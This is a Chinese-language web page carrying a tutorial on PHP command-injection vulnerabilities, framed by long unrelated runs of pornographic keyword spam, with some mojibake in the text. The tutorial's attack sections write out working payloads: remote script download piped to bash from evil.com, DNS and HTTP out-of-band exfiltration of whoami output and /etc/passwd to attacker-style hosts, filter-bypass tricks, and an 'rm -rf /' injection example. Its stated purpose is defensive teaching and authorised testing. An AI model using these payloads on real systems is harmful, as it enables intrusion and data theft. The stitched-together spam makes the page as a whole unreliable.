色五月色开心色婷婷色丁香,五月婷婷丁香花综合网,婷婷丁香五月激情综合在线,五月婷婷六月丁香动漫,婷婷丁香五月激情综合在线,丁香花中文字幕在线观看,播五月色五月开心五月网,开心激情综合网,狠狠色丁香婷婷综合最新地址,丁香视频在线观看,狠狠做六月爱婷婷综合av,久久激情五月丁香伊人

ARTICLE DETAIL

資訊詳情

深耕商務(wù)建站與企業(yè)官網(wǎng)運(yùn)營的一線實(shí)戰(zhàn)洞察。

PHP命令注入漏洞深度解析:從原理到防御的實(shí)戰(zhàn)指南

PHP命令注入漏洞深度解析:從原理到防御的實(shí)戰(zhàn)指南 1. 項目概述從一次線上故障說起那天晚上我正盯著監(jiān)控面板突然收到一連串告警。一個負(fù)責(zé)處理用戶上傳圖片、生成縮略圖的服務(wù)CPU使用率瞬間飆到100%緊接著服務(wù)器負(fù)載異常大量異常進(jìn)程被創(chuàng)建。登錄服務(wù)器一看好家伙/tmp目錄下塞滿了莫名其妙的文件ps aux里一堆wget和bash進(jìn)程在瘋狂運(yùn)行。根因很快定位到一個陳舊的圖片處理腳本里面有一行刺眼的代碼exec(convert $user_input_path output.jpg)。攻擊者通過上傳功能在文件名里嵌入了命令分隔符把簡單的圖片轉(zhuǎn)換變成了在服務(wù)器上為所欲為的“狂歡”。這就是命令注入一個看似古老卻依然活躍的Web安全漏洞而PHP的exec()、system()等函數(shù)往往是埋下這顆雷的“功臣”。命令注入Command Injection顧名思義就是攻擊者能夠?qū)阂庀到y(tǒng)命令“注入”到原本正常的應(yīng)用程序流程中并使之執(zhí)行。它不同于SQL注入操作數(shù)據(jù)庫命令注入直接威脅的是服務(wù)器操作系統(tǒng)本身危害等級通常是最高的RCE遠(yuǎn)程代碼執(zhí)行。PHP因其在Web開發(fā)中的歷史地位和靈活性大量遺留系統(tǒng)和簡單腳本中廣泛使用了exec()、system()、shell_exec()、passthru()以及反引號來調(diào)用系統(tǒng)命令完成諸如文件處理、系統(tǒng)監(jiān)控、調(diào)用外部工具等任務(wù)。這扇“方便之門”一旦對用戶輸入敞開就等于將服務(wù)器的Shell交給了攻擊者。本文將從一個資深開發(fā)和安全從業(yè)者的角度徹底拆解PHP中命令注入漏洞產(chǎn)生的原理、五花八門的攻擊手法并聚焦于真正可落地的防御方案。我不會只告訴你“要對輸入轉(zhuǎn)義”這種正確的廢話而是會深入PHP和Shell的交互層解釋為什么某些轉(zhuǎn)義會失效分享我在代碼審計和滲透測試中見過的真實(shí)繞過案例以及如何在架構(gòu)設(shè)計層面根本性地規(guī)避此類風(fēng)險。無論你是正在維護(hù)歷史代碼的PHP開發(fā)者還是對Web安全感興趣的學(xué)習(xí)者理解這個漏洞都至關(guān)重要。2. 漏洞原理深度剖析PHP如何與Shell“對話”要防御命令注入首先必須理解漏洞是如何產(chǎn)生的。這需要深入到PHP執(zhí)行系統(tǒng)命令的底層機(jī)制。2.1 exec()等函數(shù)的工作機(jī)制當(dāng)我們調(diào)用exec(“l(fā)s -la /home”)時PHP內(nèi)部發(fā)生了什么PHP進(jìn)程會通過fork()系統(tǒng)調(diào)用創(chuàng)建一個子進(jìn)程然后在這個子進(jìn)程中調(diào)用execve()系列系統(tǒng)調(diào)用啟動一個新的程序——通常是系統(tǒng)的默認(rèn)Shell如/bin/sh或/bin/bash。關(guān)鍵點(diǎn)在于PHP并不是直接執(zhí)行“l(fā)s”這個二進(jìn)制文件而是把整個字符串”ls -la /home”作為參數(shù)傳遞給Shell程序。然后由Shell來負(fù)責(zé)解析這條字符串識別出命令名ls、參數(shù)-la, /home再去PATH環(huán)境變量里找到ls命令的真實(shí)路徑并執(zhí)行。這就引入了最大的風(fēng)險點(diǎn)Shell的元字符Metacharacters。Shell為了完成復(fù)雜功能定義了一系列有特殊意義的字符例如命令分隔符;、、、||、|、\n換行管道和重定向|、、、變量和命令替換$、反引號 、$()通配符*、?、[]如果用戶輸入的數(shù)據(jù)未經(jīng)任何處理就直接拼接進(jìn)傳遞給Shell的字符串中那么輸入里的這些Shell元字符就會被Shell解析從而改變命令的原始意圖。2.2 一個經(jīng)典的漏洞代碼模式讓我們看一段極度危險但曾經(jīng)很常見的代碼?php $target_ip $_GET[‘ip‘]; // 用戶輸入 8.8.8.8; cat /etc/passwd system(“ping -c 4 “ . $target_ip); ?開發(fā)者本意是讓用戶輸入一個IP進(jìn)行ping測試。但當(dāng)攻擊者輸入8.8.8.8; cat /etc/passwd時拼接后的命令變?yōu)閜ing -c 4 8.8.8.8; cat /etc/passwdShell會將其解析為兩條順序執(zhí)行的命令先執(zhí)行ping -c 4 8.8.8.8然后執(zhí)行cat /etc/passwd。服務(wù)器上的敏感文件就這樣被泄露了。注意這里有一個非常重要的細(xì)節(jié)。很多人認(rèn)為用escapeshellarg()或escapeshellcmd()包裹整個命令就安全了這是錯誤的。這兩個函數(shù)用于轉(zhuǎn)義參數(shù)而不是整個命令字符串。如果將整個命令如system(escapeshellcmd(“ping -c 4 “ . $target_ip))對于輸入8.8.8.8; cat /etc/passwd它可能會轉(zhuǎn)義分號但更復(fù)雜的繞過仍然可能存在。安全的做法是僅將用戶輸入作為參數(shù)的一部分并對這個輸入?yún)?shù)進(jìn)行轉(zhuǎn)義。2.3 不僅僅是exec()危險函數(shù)家族exec()是最常見的但PHP中能執(zhí)行系統(tǒng)命令的函數(shù)是一個家族exec(string $command, array $output null, int $return_var null): string|false 執(zhí)行命令可以獲取最后一行輸出和返回值。通常用于不需要直接輸出而是需要處理結(jié)果的情況。system(string $command, int $return_var null): string|false 執(zhí)行命令并直接輸出結(jié)果。更“直給”常用于執(zhí)行簡單的命令。shell_exec(string $command): string|false 執(zhí)行命令并以字符串形式返回全部輸出。反引號是它的語法糖$output ls -la;等價于$output shell_exec(‘ls -la‘);。passthru(string $command, int $return_var null): void 執(zhí)行命令并直接輸出原始二進(jìn)制數(shù)據(jù)如圖像、文件流不進(jìn)行任何緩沖。常用于處理像tar、cat二進(jìn)制文件這樣的命令。popen(string $command, string $mode): resource|false和proc_open() 它們提供了更底層的進(jìn)程控制接口可以打開一個指向進(jìn)程的管道進(jìn)行雙向讀寫。功能強(qiáng)大但若使用不當(dāng)風(fēng)險同樣巨大。這些函數(shù)本質(zhì)上都面臨相同的命令注入風(fēng)險因為它們最終都是通過Shell來解釋命令字符串的。區(qū)別只在于輸出和處理方式漏洞的根源是一致的。3. 攻擊手法實(shí)戰(zhàn)演示攻擊者的“奇技淫巧”理解了原理我們來看看攻擊者在實(shí)際中會如何利用。假設(shè)有一處存在漏洞的代碼system(“nslookup “ . $_GET[‘hostname‘]);。3.1 基礎(chǔ)注入分隔符的妙用這是最直接的方式利用Shell的命令分隔符注入新的命令。分號;example.com; whoami命令變?yōu)閚slookup example.com; whoami。順序執(zhí)行。與example.com cat /etc/passwd命令變?yōu)閚slookup example.com cat /etc/passwd。只有前一條命令成功返回值為0才執(zhí)行后面的。或||example.com || curl evil.com/shell.sh | bash命令變?yōu)閚slookup example.com || curl ...。只有前一條命令失敗才執(zhí)行后面的。攻擊者可能故意輸入一個錯誤的主機(jī)名來觸發(fā)。后臺example.com sleep 10 命令變?yōu)閚slookup example.com sleep 10 。將所有命令放入后臺執(zhí)行可能用于延緩檢測或執(zhí)行耗時任務(wù)。管道|example.com | cat /etc/passwd命令變?yōu)閚slookup example.com | cat /etc/passwd。將前一個命令的輸出作為后一個命令的輸入。這里cat會忽略管道輸入直接輸出文件內(nèi)容。3.2 進(jìn)階繞過當(dāng)輸入被“過濾”時在實(shí)際攻擊中開發(fā)者可能會進(jìn)行一些簡單的過濾比如黑名單過濾;、等字符。這時攻擊者會嘗試?yán)@過。空格繞過很多過濾腳本會檢測空格但Shell中表示空格的方式不止一種。${IFS} IFS是Shell的內(nèi)部字段分隔符默認(rèn)包含空格。cat${IFS}/etc/passwd?;蛑囟ㄏ蚍鹀at/etc/passwd。后面接文件名本身可以替代空格。Tab鍵%09(URL編碼) 在某些上下文中Tab也能作為分隔符。黑名單關(guān)鍵字繞過 如果過濾了cat、ls等命令。使用變量拼接ac;bat;$a$b /etc/passwd。使用通配符/bin/c?t /etc/passwdl*。使用其他命令more、less、head、tail、nl、od等都可以用來讀取文件。使用編碼echo ‘Y2F0IC9ldGMvcGFzc3dk‘ | base64 -d | bashY2F0IC9ldGMvcGFzc3dk是cat /etc/passwd的base64編碼。命令替換與子Shell反引號echo cat /etc/passwd實(shí)際會先執(zhí)行echo cat輸出cat再執(zhí)行cat /etc/passwd這里只是示例原理。$(command) 原理同上更現(xiàn)代的形式。ls $(echo -la)。利用環(huán)境變量和通配符cat $x /etc/passwd如果$x未定義或為空就相當(dāng)于cat /etc/passwd。/???/??t /???/p??s??d這種通配符形式在特定條件下也可能繞過簡單的字符串匹配。3.3 無回顯Blind命令注入與帶外OOB數(shù)據(jù)利用很多時候命令執(zhí)行了但頁面沒有輸出例如exec()只獲取最后一行。攻擊者如何知道命令是否成功并獲取結(jié)果呢時間延遲Time-based Blind 通過注入sleep命令來判斷。example.com sleep 5 如果頁面響應(yīng)延遲了5秒說明注入成功。這可以用于構(gòu)造布爾條件例如example.com test -f /etc/passwd sleep 5如果文件存在就sleep。DNS帶外查詢DNS OOB 這是非常隱蔽有效的一種方式。example.com nslookup $(whoami).attacker-evildomain.com攻擊者控制attacker-evildomain.com的DNS服務(wù)器當(dāng)目標(biāo)服務(wù)器執(zhí)行命令時會嘗試解析當(dāng)前用戶名.attacker-evildomain.com這個域名。攻擊者查看DNS查詢?nèi)罩揪湍芸吹絯hoami命令的輸出結(jié)果被作為子域名帶出來了。HTTP帶外請求HTTP OOB 利用curl或wget將數(shù)據(jù)發(fā)送到攻擊者控制的服務(wù)器。example.com curl http://evil-server/$(cat /etc/passwd | base64)攻擊者在evil-server的Web日志中就能看到被Base64編碼的/etc/passwd文件內(nèi)容。為了避免特殊字符問題通常會對輸出進(jìn)行編碼。實(shí)操心得在滲透測試中遇到疑似盲注點(diǎn)時我首先會嘗試ping -c 1或sleep測試連通性然后立刻嘗試DNS OOB。因為很多服務(wù)器的出站流量限制防火墻可能允許DNS53端口但禁止任意HTTP而DNS請求的隱蔽性也更高。工具如Burp Suite Collaborator或dnslog.cn這類平臺可以自動化地接收和展示這類帶外數(shù)據(jù)極大提高了測試效率。4. 防御策略全景從輸入到架構(gòu)的多層防線防御命令注入絕不能只依賴某一層。我們需要一個縱深防御體系。4.1 第一道防線輸入驗證與白名單這是最根本也最有效的方法。核心思想是定義什么是合法的拒絕一切不符合規(guī)則的數(shù)據(jù)。白名單 vs 黑名單 永遠(yuǎn)優(yōu)先使用白名單。黑名單過濾危險字符注定會失敗因為繞過方式層出不窮。白名單則只允許已知安全的字符通過。如何實(shí)施對于“IP地址”參數(shù)使用正則表達(dá)式嚴(yán)格匹配IPv4/IPv6格式/^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$/或filter_var($ip, FILTER_VALIDATE_IP)。對于“主機(jī)名”參數(shù)檢查是否只包含字母、數(shù)字、點(diǎn)、連字符/^[a-zA-Z0-9.-]$/。對于“文件名”參數(shù)限制字符集并禁止路徑穿越符..、/、\。使用PHP的filter_var()函數(shù)或ctype_*系列函數(shù)進(jìn)行輔助驗證。$user_ip $_GET[‘ip‘]; if (!filter_var($user_ip, FILTER_VALIDATE_IP)) { die(‘Invalid IP address format.‘); } // 此時$user_ip 在格式上是安全的可以用于拼接 system(“ping -c 4 “ . escapeshellarg($user_ip));4.2 第二道防線安全的命令執(zhí)行與參數(shù)轉(zhuǎn)義當(dāng)必須使用系統(tǒng)命令時必須確保用戶輸入只作為數(shù)據(jù)參數(shù)而不是命令的一部分。使用escapeshellarg()函數(shù)這是最推薦、最安全的方式。它的作用是將一個字符串轉(zhuǎn)義成一個單一的、安全的Shell參數(shù)。它會給字符串加上單引號‘并將字符串中已有的單引號轉(zhuǎn)義為‘\‘‘。$user_input $_GET[‘filename‘]; // 假設(shè)輸入是 file‘; rm -rf / # $safe_argument escapeshellarg($user_input); // 輸出: ‘file‘\‘‘; rm -rf / #‘ system(“cat “ . $safe_argument); // 命令變?yōu)? cat ‘file‘\‘‘; rm -rf / #‘Shell會認(rèn)為$safe_argument是一個完整的參數(shù)值其中的分號、空格、#號都失去了特殊含義。攻擊者注入的命令被安全地“包裹”在一個字符串參數(shù)里。使用escapeshellcmd()函數(shù) 這個函數(shù)會轉(zhuǎn)義Shell元字符#;|*?~^()[]{}$使其失去特殊含義。但要注意它不處理參數(shù)邊界。通常用于轉(zhuǎn)義命令路徑而不是用戶輸入。對于用戶輸入escapeshellarg()是更安全的選擇。// 不安全的用法示例 $cmd “l(fā)s -la “ . escapeshellcmd($_GET[‘dir‘]); // 輸入 .; pwd escapeshellcmd會轉(zhuǎn)義分號變成 ls -la .\; pwd // 這仍然是危險的因為ls會嘗試列出.\和pwd兩個文件/目錄雖然不會執(zhí)行pwd命令但可能引發(fā)其他意外行為或信息泄露。最佳實(shí)踐模式使用數(shù)組參數(shù)形式調(diào)用exec()等函數(shù)PHP 5.3 抱歉這是一個常見的誤解。PHP的exec()、system()等函數(shù)本身不支持像proc_open()或popen()那樣的數(shù)組參數(shù)形式來避免Shell調(diào)用。它們總是通過Shell執(zhí)行的。要避免Shell必須使用proc_open()并設(shè)置bypass_shell選項或者使用pcntl_exec()僅限CLI模式。因此安全拼接的唯一推薦模式是exec(‘固定命令 ‘ . escapeshellarg($user_input1) . ‘ 固定參數(shù) ‘ . escapeshellarg($user_input2))。4.3 第三道防線最小權(quán)限原則與環(huán)境硬化即使代碼有漏洞我們也應(yīng)該限制漏洞被利用后造成的破壞。運(yùn)行在低權(quán)限用戶下 PHP-FPM或Apache的PHP模塊絕不要以root用戶運(yùn)行。應(yīng)該創(chuàng)建一個專用的、低權(quán)限的用戶如www-data、nginx來運(yùn)行Web服務(wù)。這樣即使被注入命令攻擊者也無法直接讀寫關(guān)鍵系統(tǒng)文件、安裝軟件等。配置open_basedir 在php.ini中設(shè)置open_basedir將PHP可訪問的文件限制在網(wǎng)站目錄內(nèi)。這可以防止攻擊者使用cat、file_get_contents()等讀取系統(tǒng)敏感文件如/etc/passwd,/proc/self/environ。禁用危險函數(shù) 在php.ini中通過disable_functions指令直接禁用不必要的命令執(zhí)行函數(shù)。disable_functions exec,system,passthru,shell_exec,popen,proc_open,pcntl_exec,curl_exec,curl_multi_exec,parse_ini_file,show_source,dl,symlink,...注意這可能會影響某些合法功能需要根據(jù)實(shí)際業(yè)務(wù)評估。對于新項目應(yīng)從一開始就避免使用這些函數(shù)。使用safe_mode的替代方案 PHP的safe_mode已被廢棄且效果有限?,F(xiàn)代PHP環(huán)境下應(yīng)通過上述的權(quán)限控制、容器化等方式實(shí)現(xiàn)隔離。4.4 第四道防線架構(gòu)優(yōu)化與替代方案最好的防御是不給攻擊者留下攻擊面。重新思考是否真的需要執(zhí)行系統(tǒng)命令使用PHP原生函數(shù)替代文件操作用scandir()替代lsfile_get_contents()/file_put_contents()替代cat/echocopy()/unlink()替代cp/rm。進(jìn)程信息用getrusage()、sys_getloadavg()替代調(diào)用top、uptime。網(wǎng)絡(luò)操作用gethostbyname()替代nslookup用fsockopen()或curl擴(kuò)展替代wget/telnet。使用經(jīng)過嚴(yán)格審查的第三方庫 例如處理圖片用Intervention Image或Imagine庫而不是調(diào)用外部的ImageMagick命令行。處理壓縮文件用ZipArchive類而不是unzip命令。這些庫通常經(jīng)過了更好的安全審計和輸入處理。將危險操作隊列化與沙盒化隊列化 如果必須執(zhí)行耗時或高風(fēng)險的外部命令如視頻轉(zhuǎn)碼不要在前端Web請求中直接執(zhí)行。應(yīng)該將任務(wù)放入消息隊列如Redis、RabbitMQ由后臺獨(dú)立的、權(quán)限受控的工作進(jìn)程Worker來消費(fèi)和執(zhí)行。這樣可以將執(zhí)行環(huán)境與Web服務(wù)隔離。沙盒化/容器化 對于極度不信任或復(fù)雜的操作可以考慮在Docker容器內(nèi)執(zhí)行。Web應(yīng)用通過API或隊列將任務(wù)和有限的輸入數(shù)據(jù)傳遞給一個一次性任務(wù)容器容器執(zhí)行完畢后即銷毀。這提供了最強(qiáng)的隔離性。5. 實(shí)戰(zhàn)代碼審計與修復(fù)案例讓我們看一個從真實(shí)老舊系統(tǒng)中摘錄的、需要修復(fù)的代碼片段。漏洞代碼示例一個簡單的服務(wù)器監(jiān)控面板// file: admin/stats.php $server $_GET[‘server‘]; // 用戶輸入服務(wù)器IP或主機(jī)名 $metric $_GET[‘metric‘]; // 用戶選擇監(jiān)控項如 ‘cpu‘, ‘disk‘ $command ““; switch ($metric) { case ‘cpu‘: $command “ssh admin$server ‘top -bn1 | grep \Cpu(s)\‘“; break; case ‘disk‘: $command “ssh admin$server ‘df -h‘“; break; default: die(‘Invalid metric.‘); } $output shell_exec($command); echo “pre“ . htmlspecialchars($output) . “/pre“;漏洞分析直接拼接用戶輸入$server 攻擊者可以控制$server變量注入SSH命令。例如server127.0.0.1; whoami;或server127.0.0.1‘ cat /etc/passwd #。使用了shell_exec() 命令通過Shell執(zhí)行所有元字符都會生效。雖然對$metric用了白名單switch-case但對$server毫無防護(hù)。修復(fù)方案修復(fù)的核心思路是1) 對$server進(jìn)行嚴(yán)格的白名單驗證2) 安全地構(gòu)建SSH命令。// file: admin/stats.php (修復(fù)后) $server $_GET[‘server‘]; $metric $_GET[‘metric‘]; // 1. 輸入驗證白名單 $allowed_servers [‘web01.internal.com‘, ‘db01.internal.com‘, ‘192.168.1.10‘]; if (!in_array($server, $allowed_servers)) { die(‘Access denied: Invalid server specified.‘); } $allowed_metrics [‘cpu‘, ‘disk‘]; if (!in_array($metric, $allowed_metrics)) { die(‘Invalid metric.‘); } // 2. 使用SSH密鑰認(rèn)證避免在命令中暴露密碼。這里假設(shè)已配置免密登錄。 // 3. 安全構(gòu)建命令將用戶輸入$server作為ssh命令的參數(shù)并使用escapeshellarg確保其安全。 $ssh_target escapeshellarg($server); $remote_command ““; switch ($metric) { case ‘cpu‘: $remote_command “‘top -bn1 | grep \\“Cpu(s)\\‘“; // 注意遠(yuǎn)程命令內(nèi)的引號轉(zhuǎn)義 break; case ‘disk‘: $remote_command “‘df -h‘“; break; } // 4. 拼接完整命令。$ssh_target 已被escapeshellarg處理是安全的。 $local_command “ssh -o ConnectTimeout5 -o BatchModeyes admin{$ssh_target} {$remote_command}“; // 5. 可選設(shè)置超時和輸出限制 $output shell_exec(“timeout 10s “ . $local_command . “ 21“); if ($output null) { echo “Failed to execute command or command timed out.“; } else { echo “pre“ . htmlspecialchars($output) . “/pre“; }修復(fù)要點(diǎn)解析$allowed_servers白名單 這是最堅固的防線直接限定只能操作預(yù)設(shè)的幾臺服務(wù)器。escapeshellarg($server) 即使白名單被意外繞過或未來動態(tài)添加服務(wù)器這也確保了$server值在本地Shell上下文中被當(dāng)作一個整體參數(shù)防止注入到ssh命令本身。SSH選項-o BatchModeyes強(qiáng)制使用密鑰認(rèn)證避免密碼提示。-o ConnectTimeout5防止因網(wǎng)絡(luò)問題導(dǎo)致進(jìn)程掛起。遠(yuǎn)程命令硬編碼$remote_command是開發(fā)者完全控制的字符串沒有用戶輸入。其中的引號需要小心轉(zhuǎn)義以確保它能在遠(yuǎn)程Shell中被正確解析。本地命令超時 使用timeout 10s包裝整個命令防止惡意命令如sleep 1000長期占用資源。錯誤處理21將標(biāo)準(zhǔn)錯誤重定向到標(biāo)準(zhǔn)輸出便于捕獲錯誤信息。檢查shell_exec的返回值是否為null通常表示執(zhí)行失敗或命令不存在。6. 高級話題與常見誤區(qū)6.1 proc_open() 與 pcntl_exec() 的安全性proc_open() 這個函數(shù)提供了最精細(xì)的進(jìn)程控制。它的一個關(guān)鍵安全優(yōu)勢是可以繞過Shell。通過將$descriptorspec參數(shù)配置好并使用$pipes進(jìn)行通信你可以將命令和參數(shù)以數(shù)組形式傳遞從而避免字符串被Shell解析。$cmd ‘/usr/bin/convert‘; $args [‘input.jpg‘, ‘-resize‘, ‘50%‘, ‘output.jpg‘]; // 用戶輸入需經(jīng)過escapeshellarg處理后再放入數(shù)組 $proc proc_open(array_merge([$cmd], $args), $descriptorspec, $pipes);但是請注意即使使用數(shù)組如果$cmd本身來自用戶輸入比如允許用戶選擇/bin/bash或/usr/bin/python風(fēng)險依然存在。數(shù)組形式只能防止參數(shù)注入不能防止命令替換。$cmd本身必須來自可信源白名單。pcntl_exec() 這個函數(shù)在當(dāng)前進(jìn)程空間內(nèi)直接執(zhí)行指定程序完全不經(jīng)過Shell。這是最安全的方式之一但它有兩個主要限制1) 僅能在CLI命令行模式下使用2) 執(zhí)行后當(dāng)前PHP進(jìn)程會結(jié)束難以獲取輸出。因此它不適合Web場景。6.2 關(guān)于 escapeshellarg 和 escapeshellcmd 的經(jīng)典誤區(qū)網(wǎng)上很多文章會說“用escapeshellcmd()過濾整個命令用escapeshellarg()過濾參數(shù)”。這個說法不準(zhǔn)確且危險。escapeshellcmd($whole_command) 它只會轉(zhuǎn)義命令字符串中出現(xiàn)的Shell元字符。如果用戶輸入是命令的一部分如ping 127.0.0.1; ls轉(zhuǎn)義分號后變成ping 127.0.0.1\; ls這仍然是一個一個命令ping帶著兩個參數(shù)127.0.0.1;和ls。ping命令會嘗試連接主機(jī)名為127.0.0.1;的機(jī)器這通常會導(dǎo)致錯誤雖然不會執(zhí)行l(wèi)s但已經(jīng)改變了命令的語義可能引發(fā)其他問題如錯誤信息泄露、參數(shù)注入到ping命令本身。它不能安全地將用戶輸入隔離為一個參數(shù)。正確的做法永遠(yuǎn)將用戶輸入視為數(shù)據(jù)并使用escapeshellarg()將其轉(zhuǎn)化為一個安全的、被引號包裹的參數(shù)然后再拼接到固定的命令框架中。即safe_command ‘固定命令 ‘ . escapeshellarg($user_input)。6.3 現(xiàn)代PHP框架與依賴包的風(fēng)險即使你使用了Laravel、Symfony等現(xiàn)代框架風(fēng)險依然存在??蚣鼙旧硗ǔ2粫苯右朊钭⑷氲_發(fā)者可能錯誤地使用它們。Artisan 命令 Laravel的Artisan命令可以通過Artisan::call()或\Illuminate\Support\Facades\Artisan調(diào)用。如果用戶輸入直接傳遞給了Artisan命令的參數(shù)而該Artisan命令內(nèi)部又調(diào)用了exec()風(fēng)險鏈就形成了。需要審計自定義Artisan命令的代碼。第三方包Composer 很多包為了便捷會封裝系統(tǒng)命令。例如某些圖片處理包、PDF生成包、備份包等。在引入這些包時需要閱讀其源碼或文檔確認(rèn)其執(zhí)行命令時是否安全地處理了輸入。不要盲目相信“流行就等于安全”。序列化與反序列化漏洞 雖然不直接是命令注入但PHP反序列化漏洞可能導(dǎo)致任意代碼執(zhí)行其結(jié)果與命令注入等同。確保不對不可信的數(shù)據(jù)進(jìn)行unserialize()操作。7. 自動化檢測與滲透測試技巧作為開發(fā)者除了編寫安全代碼也需要具備基礎(chǔ)的漏洞檢測能力。7.1 代碼審計中的快速定位全局搜索危險函數(shù) 在項目目錄下使用grep或IDE的全局搜索查找以下關(guān)鍵詞grep -r “exec\|system\|passthru\|shell_exec\|popen\|proc_open\|pcntl_exec\|“ . --include“*.php“分析用戶輸入流 對于找到的每個危險函數(shù)調(diào)用向上追溯其參數(shù)來源。是否來自$_GET、$_POST、$_REQUEST、$_COOKIE、$_SERVER某些HTTP頭可能不可信是否經(jīng)過了安全的處理檢查過濾邏輯 如果發(fā)現(xiàn)了過濾函數(shù)如str_replace過濾分號思考是否能繞過如使用${IFS}、換行符、編碼等。7.2 簡單的滲透測試驗證在獲得合法授權(quán)的前提下可以對疑似點(diǎn)進(jìn)行測試?;A(chǔ)測試Payload; whoami| whoami whoami|| whoami$(whoami)whoami盲注測試Payload; sleep 5 ping -c 5 127.0.0.1 注意觀察響應(yīng)時間或服務(wù)器負(fù)載 curl http://your-collaborator-domain使用Burp Collaborator或RequestBin nslookup $(whoami).your-collaborator-domain工具輔助Burp Suite 使用Intruder模塊配合包含各種命令分隔符和繞過技巧的Payload字典進(jìn)行Fuzz測試。Commix 一個自動化的命令注入檢測和利用工具可以集成到Burp Suite中。OWASP ZAP 包含基礎(chǔ)的命令注入掃描規(guī)則。注意事項未經(jīng)授權(quán)的滲透測試是非法的。所有安全測試必須在目標(biāo)系統(tǒng)所有者明確授權(quán)、并在隔離的測試環(huán)境中進(jìn)行。在生產(chǎn)環(huán)境進(jìn)行未經(jīng)授權(quán)的測試等同于攻擊行為將承擔(dān)法律責(zé)任。命令注入漏洞的根源在于“信任了不可信的數(shù)據(jù)”。防御它需要開發(fā)者建立起牢固的安全意識所有來自外部的輸入都是惡意的直到被證明是安全的。通過白名單輸入驗證、安全的參數(shù)轉(zhuǎn)義、最小權(quán)限運(yùn)行和架構(gòu)層面的隔離我們可以將這個高危漏洞的風(fēng)險降到最低。在PHP的世界里escapeshellarg()是你最忠實(shí)的朋友而shell_exec()和反引號則是需要被時刻警惕的“危險伙伴”。記住安全不是一個功能而是一個貫穿設(shè)計、開發(fā)、測試、部署全流程的基礎(chǔ)屬性。每一次調(diào)用系統(tǒng)命令前都請多問自己一句“這里的用戶輸入我真的處理好了嗎”
返回列表
PREV
查看更多資訊
NEXT
返回資訊列表
日韩不卡毛片Av免费高清| 一级日本牲交大片好爽在线看| www.色五月| 久久久久亚洲一区女同性恋中文字幕| 久久久久久九九九| 在线视频一区二区传媒| 97超碰久久| 欧美黄片视频在线观看免费| 少妇丝袜在线观看AV| 在线观看一级α片刺激高潮视频| 蜜臀av一区二区三区免费观看| 伊人四虎综合| 无码 有码 国产18p| www. 男人天堂成人在线| 精品人妻免费观看| 超碰这里只有精品| 乱伦av麻豆| 天天综合网1| 熟女激情综合网| 久久久久久91香蕉国产| 亚洲成人黄色在线观看| 国产专区路线| 日韩精品一区二区日韩| 中文熟女五十乱码在线| 亚洲欧美色图小说| 少妇同性| 大香蕉伊人75| 五月久久HDAV| 午夜一区二区三区国产| 天美传媒av一区二区| 八人操人人摸人人看| 久久久久久九九九九-美女久久久久久久-成人AV | 女人久久久| 久热色情精品| 中文字幕国产| 久久精品国产99久久,亚洲日韩久久日本一区一区三区 | 午夜在线播放| 男人的天堂99| 奇米四色影视777久久久| 精品国产一区二区久久| 精品人妻免费观看| 色男人色天堂东京热| 亚洲AV秘 精品久久老牛影视| 啊嗯嗯啊好大好爽| 狠狠狠狠狠干| 成人26uuu| 亚洲一本色码中文字幕| 成人在线日韩| 午夜无遮挡男女啪啪视频| 日韩 成人 有码| 国产亚州高清国产拍精| 亚洲欧美高清无码| 天天拍天| 男人天堂婷婷五月天校园春色| 色网综合网| 思思热免费在线视频| 超碰欧美97资源| 五月丁香婷婷综合| 伦激情人妻另类人妻| 超碰午夜| 成人精品视频一区二区| 国产精品亚洲免费| 黄色AAAAA欧美| 国产超碰在线一区| 久久精品国产亚洲粉嫩| 亚洲欧美天堂在线| 欧美日韩性爱操大逼| 欧综合网| 999九九精品| 午夜大香蕉| 国产福利视频精品视频| 亚洲熟女人妻中文字幕一区二区| 久久神马影院| 久久久久久久一级黄色打同平台| 最新中文字幕在线亚洲| 影音先锋每日最新资源在线观看 | 性爱乱伦网址| 天天日天天射天天干| 北条麻妃99精品青青久久| 加勒比综合88| 欧美在线综合| 骚人妻少妇视频| 97超级久久强资源| 亚洲午夜免费狠狠干| 97精品一区二区视频在线观看| 天天综合青苹果| 中文字日本乱码| 国语国产操逼伊人AV网| 亚洲日韩欧美一区二区| 久96热在线观看视频| 日韩女模中文造逼| 色婷婷视频| 亚洲欧美综合图片| 蜜桃臀一区二区aV| 日日夜夜噜| 欧美狠狠弄| 麻豆天美国美国产| 青青操青娱乐| ss久久| 99热这里是精品| av天堂5| 亚洲国产成人精品久久久国产成人一区二区三. | 黄色av片三级三级三级免费看| 97亚洲欧美| 自拍第一页| 丝袜美女诱惑 91 视频| 91爱欧美| 色偷综合| 亚洲综合 欧美| 狠综合网| 欧洲精品欧洲精品| 欧美第二页午夜| 亚洲视频二区| 啊啊啊操死我了| 尤物视频偷拍免费| 婷婷九月丁香| 色色九区| 色婷婷五月综合| 影音先锋中文字幕日本好一区二区| 伦伦成年午夜免费视频| 亚洲天堂热| 久久久婷| 欧美夜夜狠| 日本亚洲vr欧美不卡高清专区| 亚洲一区中文字幕久久,果冻传媒一区二区天美传媒 | 亚洲天天天| 欧美丰满少妇交换91欧美精品| 粉嫩久久久极品| 国产乱码久久久| 亚洲人妻五月丁香婷婷| 91中文字幕| 精品福利| 看一级特黄a大一片| 亚洲国产日韩欧美熟妇在线| 日韩人妻少妇 一区二区三区| 丁香五月天激情| 精品久久久av| 经典丝袜一区| 麻豆精品一区二区三区四区免费观看| 成人a v在线播放免费| 国产一级特黄大片处女| 青青草操逼逼视频| 国产精品乱码久久久、久久| 中文字幕一二三| 亚洲码在线中文在线观看| 国产Aα| 免费强奸av| 99这里有精品视频| 老女人老91妇女老热女| 欧美 亚洲精品首页| 天天干人人看综合| 久久精品国产免费观看99| 丁香婷婷久久| 日本一片一区| 欧美性爱一区二区三区| 懂色av色欲av蜜臀av| 操婷婷逼| 亚洲在高跟鞋自慰久久在色线| 青青草国产一区二区三区| 天天爽天天操啊啊啊| 操操吧亚洲乱伦视频| 97最新在线播放视频| 国产偷仑| 放黄片放3级黄片没穿衣服| 亚洲国产精品V?在线播放| 簧片免费看视频| 欧美一区二区三区大综合| 青青草影视蜜久久| 1769国内精品视频| 91殴美大片| 97在线免费公开视频| 国产精品白领在线观看| 久久女人一区二区三区| 亚州性色| 激情丁香五月婷婷| 春色综合免费| 天天草夜夜草高潮片| 涩涩五月天| 久久精品国产精品| 黄色片,com| 色一射色一射| 校园春色五月天| 日本色婷婷| 四虎在线免费视频| 午夜乱轮操逼视频免费看| 久久黄黄| 亚洲深夜福利| 99热成人| 欧美性色欧美| 国产乱伦一二三区| 久射吧| 日本激情免费大片| 国产第11页| 